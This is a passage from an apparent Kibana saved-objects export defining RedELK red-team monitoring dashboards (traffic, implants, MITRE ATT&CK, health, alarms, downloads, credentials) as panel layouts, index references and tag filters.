"{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_redteam\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_redteam\"}}},{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_customer\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_customer\"}}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_948c1286-d4de-44a6-8fb2-95bf9252ed00\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":5,\"i\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"w\":36,\"x\":0,\"y\":2},\"panelIndex\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"Filters\",\"panelRefName\":\"panel_ab9eb0fb-a164-4295-8177-865a2a67dccb\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":5,\"i\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"w\":12,\"x\":36,\"y\":2},\"panelIndex\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic per backend\",\"panelRefName\":\"panel_c630a33e-6a98-466d-8223-fd83e6947b8c\"},{\"version\":\"7.10.0\",\"type\":\"map\",\"gridData\":{\"h\":15,\"i\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"w\":24,\"x\":0,\"y\":7},\"panelIndex\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"embeddableConfig\":{\"hiddenLayers\":[],\"hidePanelTitles\":false,\"isLayerTOCOpen\":false,\"mapCenter\":{\"lat\":14.5701,\"lon\":121.0254,\"zoom\":17},\"openTOCDetails\":[],\"enhancements\":{}},\"title\":\"HTTP redir traffic map\",\"panelRefName\":\"panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":15,\"i\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"w\":24,\"x\":24,\"y\":7},\"panelIndex\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic over time\",\"panelRefName\":\"panel_fc254327-57ac-4e5f-88f7-a32d48570289\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":15,\"i\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"w\":24,\"x\":0,\"y\":22},\"panelIndex\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_829f61cf-9374-4bb5-8214-34e6875e79da\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"h\":22,\"i\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"w\":48,\"x\":0,\"y\":37},\"panelIndex\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_0bc5f60b-f940-451a-886b-edff3512d180\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-1d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Traffic dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "948c1286-d4de-44a6-8fb2-95bf9252ed00:panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", "type": "visualization"}, {"id": "56350050-efe7-11eb-8a9f-2572da287875", "name": "ab9eb0fb-a164-4295-8177-865a2a67dccb:panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", "type": "visualization"}, {"id": "d625ba60-efe8-11eb-8a9f-2572da287875", "name": "c630a33e-6a98-466d-8223-fd83e6947b8c:panel_c630a33e-6a98-466d-8223-fd83e6947b8c", "type": "visualization"}, {"id": "dd9e9510-efec-11eb-8a9f-2572da287875", "name": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a:panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "type": "map"}, {"id": "be08d380-efe9-11eb-8a9f-2572da287875", "name": "fc254327-57ac-4e5f-88f7-a32d48570289:panel_fc254327-57ac-4e5f-88f7-a32d48570289", "type": "visualization"}, {"id": "cbb7d710-efee-11eb-8a9f-2572da287875", "name": "829f61cf-9374-4bb5-8214-34e6875e79da:panel_829f61cf-9374-4bb5-8214-34e6875e79da", "type": "visualization"}, {"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "0bc5f60b-f940-451a-886b-edff3512d180:panel_0bc5f60b-f940-451a-886b-edff3512d180", "type": "search"}], "sort": [1642152857910, 2076], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK implants dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"sandboxes_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"sandboxes_v01\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"testsystems_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"testsystems_v01\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":15,\"i\":\"1\"},\"panelIndex\":\"1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":15,\"i\":\"2\"},\"panelIndex\":\"2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":17,\"w\":24,\"h\":15,\"i\":\"3\"},\"panelIndex\":\"3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":32,\"w\":48,\"h\":22,\"i\":\"4\"},\"panelIndex\":\"4\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_4\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":17,\"w\":24,\"h\":15,\"i\":\"5\"},\"panelIndex\":\"5\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_5\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},\"panelIndex\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":54,\"w\":48,\"h\":19,\"i\":\"b9915fcd-f22e-4326-986a-25684f947b79\"},\"panelIndex\":\"b9915fcd-f22e-4326-986a-25684f947b79\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_b9915fcd-f22e-4326-986a-25684f947b79\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-30d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Implants dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "name": "1:panel_1", "type": "visualization"}, {"id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "name": "2:panel_2", "type": "visualization"}, {"id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "name": "3:panel_3", "type": "visualization"}, {"id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "name": "4:panel_4", "type": "visualization"}, {"id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "name": "5:panel_5", "type": "visualization"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c:panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", "type": "visualization"}, {"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "b9915fcd-f22e-4326-986a-25684f947b79:panel_b9915fcd-f22e-4326-986a-25684f947b79", "type": "search"}], "sort": [1642152857910, 2086], "type": "dashboard", "version": "1"} -{"attributes": {"description": "MITRE ATT&CK dashboard showing TTPs used (SIEM detection must be configured first)", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":21,\"h\":17,\"i\":\"e4271670-160e-444d-bb78-46ae1e1c7339\"},\"panelIndex\":\"e4271670-160e-444d-bb78-46ae1e1c7339\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Tactics\",\"panelRefName\":\"panel_e4271670-160e-444d-bb78-46ae1e1c7339\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":21,\"y\":2,\"w\":27,\"h\":17,\"i\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},\"panelIndex\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Techniques\",\"panelRefName\":\"panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":19,\"w\":24,\"h\":15,\"i\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\"},\"panelIndex\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_de3ced26-2a55-43f5-af28-dc5c2b967c29\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":19,\"w\":24,\"h\":15,\"i\":\"38e24827-8707-4583-805a-98e4138495a7\"},\"panelIndex\":\"38e24827-8707-4583-805a-98e4138495a7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_38e24827-8707-4583-805a-98e4138495a7\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":34,\"w\":48,\"h\":15,\"i\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\"},\"panelIndex\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_60dc249a-1ad0-456c-850b-95c77ea0bc18\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\"},\"panelIndex\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa\"}]", "timeRestore": false, "title": "RedELK - MITRE ATT&CK", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "name": "e4271670-160e-444d-bb78-46ae1e1c7339:panel_e4271670-160e-444d-bb78-46ae1e1c7339", "type": "visualization"}, {"id": "abdcd940-d050-11ea-9301-a30a04251ae9", "name": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8:panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", "type": "visualization"}, {"id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "name": "de3ced26-2a55-43f5-af28-dc5c2b967c29:panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", "type": "visualization"}, {"id": "231792d0-d050-11ea-9301-a30a04251ae9", "name": "38e24827-8707-4583-805a-98e4138495a7:panel_38e24827-8707-4583-805a-98e4138495a7", "type": "visualization"}, {"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "60dc249a-1ad0-456c-850b-95c77ea0bc18:panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", "type": "search"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "3b895da0-50d0-49e0-a18d-790fd2dddaaa:panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", "type": "visualization"}], "sort": [1642152857910, 2093], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},\"panelIndex\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},\"panelIndex\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":16,\"h\":7,\"i\":\"cd30bef4-7955-437a-adaf-317839c35931\"},\"panelIndex\":\"cd30bef4-7955-437a-adaf-317839c35931\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd30bef4-7955-437a-adaf-317839c35931\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":16,\"y\":4,\"w\":21,\"h\":18,\"i\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\"},\"panelIndex\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cc62352b-f1ed-47fb-9687-d51a44693d13\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":37,\"y\":4,\"w\":11,\"h\":18,\"i\":\"1d8af391-0559-412f-a001-12acc85b49ab\"},\"panelIndex\":\"1d8af391-0559-412f-a001-12acc85b49ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1d8af391-0559-412f-a001-12acc85b49ab\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":16,\"h\":11,\"i\":\"cd45ce11-0279-476b-90c3-bd5733193a72\"},\"panelIndex\":\"cd45ce11-0279-476b-90c3-bd5733193a72\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd45ce11-0279-476b-90c3-bd5733193a72\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":22,\"w\":48,\"h\":16,\"i\":\"aa8ee839-556c-47ce-81af-451090b86f71\"},\"panelIndex\":\"aa8ee839-556c-47ce-81af-451090b86f71\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_aa8ee839-556c-47ce-81af-451090b86f71\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-15y", "timeRestore": true, "timeTo": "now", "title": "RedELK - Health", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "509e6a80-926a-11eb-a753-9da683898c26", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "5f3b82fd-613e-460e-a5a3-b7a9c9036060:panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2:panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", "type": "visualization"}, {"id": "20fac240-926c-11eb-a753-9da683898c26", "name": "cd30bef4-7955-437a-adaf-317839c35931:panel_cd30bef4-7955-437a-adaf-317839c35931", "type": "visualization"}, {"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "cc62352b-f1ed-47fb-9687-d51a44693d13:panel_cc62352b-f1ed-47fb-9687-d51a44693d13", "type": "search"}, {"id": "2f971ac0-926b-11eb-a753-9da683898c26", "name": "1d8af391-0559-412f-a001-12acc85b49ab:panel_1d8af391-0559-412f-a001-12acc85b49ab", "type": "visualization"}, {"id": "2f77a150-926a-11eb-a753-9da683898c26", "name": "cd45ce11-0279-476b-90c3-bd5733193a72:panel_cd45ce11-0279-476b-90c3-bd5733193a72", "type": "visualization"}, {"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "aa8ee839-556c-47ce-81af-451090b86f71:panel_aa8ee839-556c-47ce-81af-451090b86f71", "type": "search"}], "sort": [1642152857910, 2101], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK alarms dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":18,\"h\":11,\"i\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\"},\"panelIndex\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC over time\",\"panelRefName\":\"panel_74b481ca-ae10-4039-b6bf-474b5a409c0e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":18,\"y\":2,\"w\":6,\"h\":11,\"i\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\"},\"panelIndex\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_13abf5b9-28bf-4d51-9c63-2416603499e7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":6,\"h\":11,\"i\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},\"panelIndex\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":30,\"y\":2,\"w\":18,\"h\":11,\"i\":\"c8ae192f-f081-49eb-8e60-3122d0377314\"},\"panelIndex\":\"c8ae192f-f081-49eb-8e60-3122d0377314\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic over time\",\"panelRefName\":\"panel_c8ae192f-f081-49eb-8e60-3122d0377314\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":14,\"i\":\"b95813af-9600-4e44-93de-9acfaa6f911c\"},\"panelIndex\":\"b95813af-9600-4e44-93de-9acfaa6f911c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC\",\"panelRefName\":\"panel_b95813af-9600-4e44-93de-9acfaa6f911c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":27,\"w\":48,\"h\":17,\"i\":\"67fd9bda-6d1a-4089-a588-b683ad113558\"},\"panelIndex\":\"67fd9bda-6d1a-4089-a588-b683ad113558\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic\",\"panelRefName\":\"panel_67fd9bda-6d1a-4089-a588-b683ad113558\"}]", "timeRestore": false, "title": "RedELK - Alarms dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "name": "74b481ca-ae10-4039-b6bf-474b5a409c0e:panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "13abf5b9-28bf-4d51-9c63-2416603499e7:panel_13abf5b9-28bf-4d51-9c63-2416603499e7", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "e146bc43-4ec7-4fbb-8dcf-3df505b52932:panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", "type": "visualization"}, {"id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "name": "c8ae192f-f081-49eb-8e60-3122d0377314:panel_c8ae192f-f081-49eb-8e60-3122d0377314", "type": "visualization"}, {"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "b95813af-9600-4e44-93de-9acfaa6f911c:panel_b95813af-9600-4e44-93de-9acfaa6f911c", "type": "search"}, {"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "67fd9bda-6d1a-4089-a588-b683ad113558:panel_67fd9bda-6d1a-4089-a588-b683ad113558", "type": "search"}], "sort": [1642152857910, 2109], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK downloads dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "optionsJSON": "{\"useMargins\":true,\"hidePanelTitles\":false}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\"},\"panelIndex\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_55aca97f-b1f0-43b1-af44-756fe59be5fc\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},\"panelIndex\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},\"panelIndex\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":16,\"i\":\"9a987436-c698-4236-9b92-bfab81de8cc1\"},\"panelIndex\":\"9a987436-c698-4236-9b92-bfab81de8cc1\",\"embeddableConfig\":{\"sort\":[\"@timestamp\",\"desc\",[\"@timestamp\",\"desc\"]],\"enhancements\":{}},\"panelRefName\":\"panel_9a987436-c698-4236-9b92-bfab81de8cc1\"}]", "timeRestore": false, "title": "RedELK - Downloads dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "643de010-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", "type": "visualization"}, {"id": "85446c80-d04b-11ea-9301-a30a04251ae9", "name": "8375955c-eab4-48d9-ac8a-e4de3dd6fab2:panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "1e1864e7-1cbf-41bf-a9a5-8afadce8cadf:panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf", "type": "visualization"}, {"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "9a987436-c698-4236-9b92-bfab81de8cc1:panel_9a987436-c698-4236-9b92-bfab81de8cc1", "type": "search"}], "sort": [1642152857910, 2115], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK credentials dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\"},\"panelIndex\":\"f26413a8-7bc3-4d63-8e2e-02d1c8e06b51\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Credentials over 